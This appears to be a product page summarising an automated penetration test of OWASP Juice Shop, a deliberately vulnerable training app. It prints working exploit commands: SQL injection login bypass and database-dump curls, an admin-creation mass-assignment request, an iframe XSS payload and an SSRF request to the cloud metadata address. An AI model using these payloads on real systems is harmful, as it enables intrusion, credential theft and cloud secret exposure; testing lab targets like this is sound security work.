Skip to main content
Shannon successfully identified over 20 high-impact vulnerabilities across targeted OWASP categories in a single automated run against OWASP Juice Shop, a notoriously insecure web application maintained by OWASP.
The full report is available in the Shannon repository at sample-reports/shannon-report-juice-shop.md

Executive summary

  • Target: OWASP Juice Shop
  • Assessment Date: September 2025
  • Scope: Authentication, XSS, SQL and Command Injection, SSRF, Authorization testing
  • Total vulnerabilities: 20+ critical and high-severity findings

Key accomplishments

Complete authentication bypass

SQL injection enabling admin access without credentials

Database exfiltration

UNION-based SQL injection extracting entire user database including password hashes

Privilege escalation

Created new administrator account through registration workflow bypass

Authorization bypass (IDOR)

Accessed and modified any user’s private data and shopping cart

SSRF exploitation

Internal network reconnaissance via profile image URL vulnerability

Multiple XSS vectors

Reflected XSS via Angular bypass and JSONP callback exploitation

Vulnerability breakdown

Authentication vulnerabilities (Critical)

Location: POST /rest/user/login (email field)
Severity: Critical
Impact: Complete admin access bypassExploit:
curl -X POST http://juice-shop.local:3001/rest/user/login \
  -H "Content-Type: application/json" \
  -d '{"email":"'\''\'' OR '\''\'1'\''\''='\''\'1'\''\'' --","password":"test"}'
Proof of impact:
Successfully obtained admin JWT token for user ID 1 ([email protected]) with role “admin”.Code reference: /routes/login.ts:34 - Direct string interpolation in SQL query
Location: POST /rest/user/login
Severity: High
Impact: Account compromise via brute forceMissing rate limiting allows unlimited authentication attempts, enabling credential stuffing and password brute force attacks.
Location: User password storage
Severity: High
Impact: Rapid password recovery from database dumpsWeak MD5 hashing with no salt enables instant password recovery. Admin password hash cracked in seconds using online rainbow tables.

Authorization vulnerabilities (Critical)

Location: POST /api/Users/ (registration endpoint)
Severity: Critical
Impact: Instant admin privilege escalationExploit:
curl -X POST http://juice-shop.local:3001/api/Users/ \
  -H "Content-Type: application/json" \
  -d '{"email":"[email protected]","password":"Password123","role":"admin"}'
Successfully created a new admin account through mass assignment vulnerability.
Location: GET /rest/user/{id}
Severity: High
Impact: Horizontal privilege escalation to any user accountNo authorization check on user ID parameter allows accessing any user’s profile, including email, address, and payment information.
Location: GET/POST /rest/basket/{id}
Severity: High
Impact: Access and modify any user’s shopping cartPredictable basket IDs with no ownership validation enable viewing and modifying other users’ carts.

SQL injection vulnerabilities (Critical)

Location: GET /rest/products/search (q parameter)
Severity: Critical
Impact: Complete database compromiseExploit:
curl -s "http://juice-shop.local:3001/rest/products/search?q=xxx%25%27%29%20AND%20description%20LIKE%20%27%25xxx%25%27%29%20UNION%20SELECT%20id,email,password,role,0,0,0,0,0%20FROM%20Users%20LIMIT%205--"
Successfully extracted:
  • All user emails and password hashes
  • User roles (admin, customer)
  • Complete database schema
Code reference: /routes/search.ts:18 - Unsanitized query parameter
Location: Login and search endpoints
Severity: High
Impact: Authentication bypass and mass data manipulationMongoDB operator injection ($ne, $gt) enables bypassing authentication and bulk data modification.

XSS vulnerabilities (High)

Location: Search functionality
Severity: High
Impact: Session hijacking, credential theftExploit:
<iframe src="javascript:alert('XSS')">
Successfully bypassed Angular’s sanitization using iframe-based payload.
Location: JSONP endpoints
Severity: High
Impact: Cross-domain data exfiltrationUnvalidated JSONP callback parameter allows arbitrary JavaScript execution for cross-domain attacks.

SSRF vulnerabilities (High)

Location: POST /profile/image/url
Severity: High
Impact: Internal network reconnaissance, cloud metadata accessExploit:
curl -X POST http://juice-shop.local:3001/profile/image/url \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"imageUrl":"http://169.254.169.254/latest/meta-data/"}'
Successfully accessed:
  • Internal services (Solr, Redis)
  • Cloud metadata endpoints
  • File system via file:// protocol

Additional findings

Location: XML upload endpoints
Severity: High
Impact: Local file read accessExternal entity injection in XML parser enables reading arbitrary files from the server file system.
Location: Configuration upload
Severity: Medium
Impact: Denial of serviceUnsafe YAML deserialization allows resource exhaustion attacks.
Location: Deluxe membership, checkout flow
Severity: High
Impact: Payment bypass, order manipulationMultiple business logic flaws enable:
  • Free deluxe membership activation
  • Checking out other users’ carts
  • Negative pricing via coupon stacking

Impact summary

Combined impact: These vulnerabilities provide complete application compromise:
  1. Full authentication bypass via SQL injection
  2. Complete database access with user credentials and payment data
  3. Privilege escalation to admin via registration bypass
  4. Horizontal access to all user accounts via IDOR
  5. Internal network access via SSRF
  6. Session hijacking via XSS

Statistics

MetricValue
Total vulnerabilities20+
Critical severity8
High severity12+
Runtime1.5 hours
API cost~$50 USD
False positives0

Full report

View complete report in GitHub

OWASP Juice Shop

Official Juice Shop repository

Run your own test

Test Shannon against Juice Shop

Benchmark results

96.15% success rate on XBOW

Build docs developers (and LLMs) love

Get started for freeTalk to us